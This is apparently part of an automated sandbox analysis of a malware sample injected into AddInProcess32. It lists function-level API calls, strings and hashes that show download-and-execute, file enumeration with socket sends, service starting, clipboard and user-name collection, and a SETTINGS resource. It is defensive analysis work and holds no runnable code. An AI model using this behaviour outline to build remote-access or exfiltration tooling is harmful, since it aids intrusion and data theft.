                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                  • String ID:
                  • API String ID: 1824512719-0
                  • Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                  • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                  • Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                  • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                  Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                  Download Yara Rule
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandle$Open$ManagerStart
                  • String ID:
                  • API String ID: 276877138-0
                  • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                  • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                  • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                  • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                  Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 00413569
                    • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32 ref: 00413587
                    • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                  • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                  • ExitProcess.KERNEL32 ref: 0040F8CA
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseExitOpenProcessQuerySleepValue
                  • String ID: 5.1.0 Pro$override$pth_unenc
                  • API String ID: 2281282204-182549033
                  • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                  • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                  • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                  • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                  Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                  Download Yara Rule
                  APIs
                  • FindResourceA.KERNEL32 ref: 0041B4B9
                  • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                  • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                  • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Resource$FindLoadLockSizeof
                  • String ID: SETTINGS
                  • API String ID: 3473537107-594951305
                  • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                  • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                  • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                  • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                  Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 0040966A
                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstH_prologNext
                  • String ID:
                  • API String ID: 1157919129-0
                  • Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                  • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                  • Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                  • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                  Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00408811
                  • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                  • String ID:
                  • API String ID: 1771804793-0
                  • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                  • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                  • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                  • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                  Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                  Download Yara Rule
                  APIs
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DownloadExecuteFileShell
                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                  • API String ID: 2825088817-2881483049
                  • Opcode ID: 78e10e9a612b22b91ebf8b2931271f85cca1af5336b97d423d0fb1973267ad11
                  • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                  • Opcode Fuzzy Hash: 78e10e9a612b22b91ebf8b2931271f85cca1af5336b97d423d0fb1973267ad11
                  • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                  Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFind$FirstNextsend
                  • String ID: XPG$XPG
                  • API String ID: 4113138495-1962359302
                  • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                  • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                  • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                  • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                  Function 004461F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMONLIBRARYCODE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: PkGNG
                  • API String ID: 0-263838557
                  • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                  • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                  • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                  • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                  Function 00451CD8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                  • String ID: sJD
                  • API String ID: 1661935332-3536923933
                  • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                  • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                  • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                  • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                  Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorInfoLastLocale$_free$_abort
                  • String ID:
                  • API String ID: 2829624132-0
                  • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                  • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                  • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                  • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                  Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                  • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$AcquireRandomRelease
                  • String ID:
                  • API String ID: 1815803762-0
                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                  • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                  • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                  Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Clipboard$CloseDataOpen
                  • String ID:
                  • API String ID: 2058664381-0
                  • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                  • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                  • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                  • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                  Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .
                  • API String ID: 0-248832578
                  • Opcode ID: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                  • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                  • Opcode Fuzzy Hash: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                  • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                  Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                  • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                  • String ID: lJD
                  • API String ID: 1084509184-3316369744
                  • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                  • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                  • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                  • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                  Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                  • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                  • String ID: lJD
                  • API String ID: 1084509184-3316369744
                  • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                  • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                  • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                  • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                  Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoLocale
                  • String ID: GetLocaleInfoEx
                  • API String ID: 2299586839-2904428671
                  • Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                  • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                  • Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                  • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                  Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                  • HeapFree.KERNEL32(00000000), ref: 004120EE
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$FreeProcess
                  • String ID:
                  • API String ID: 3859560861-0
                  • Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                  • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                  • Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                  • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                  Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$_free$InfoLocale_abort
                  • String ID:
                  • API String ID: 1663032902-0
                  • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                  • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                  • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                  • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                  Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$InfoLocale_abort_free
                  • String ID:
                  • API String ID: 2692324296-0
                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                  • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                  • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                  Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                  Download Yara Rule
                  APIs
                  • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: NameUser
                  • String ID:
                  • API String ID: 2645101109-0
                  • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                  • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                  • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                  • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                  Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                  • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CriticalEnterEnumLocalesSectionSystem
                  • String ID:
                  • API String ID: 1272433827-0
                  • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                  • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                  • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                  • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                  Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                  • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                  Memory Dump Source
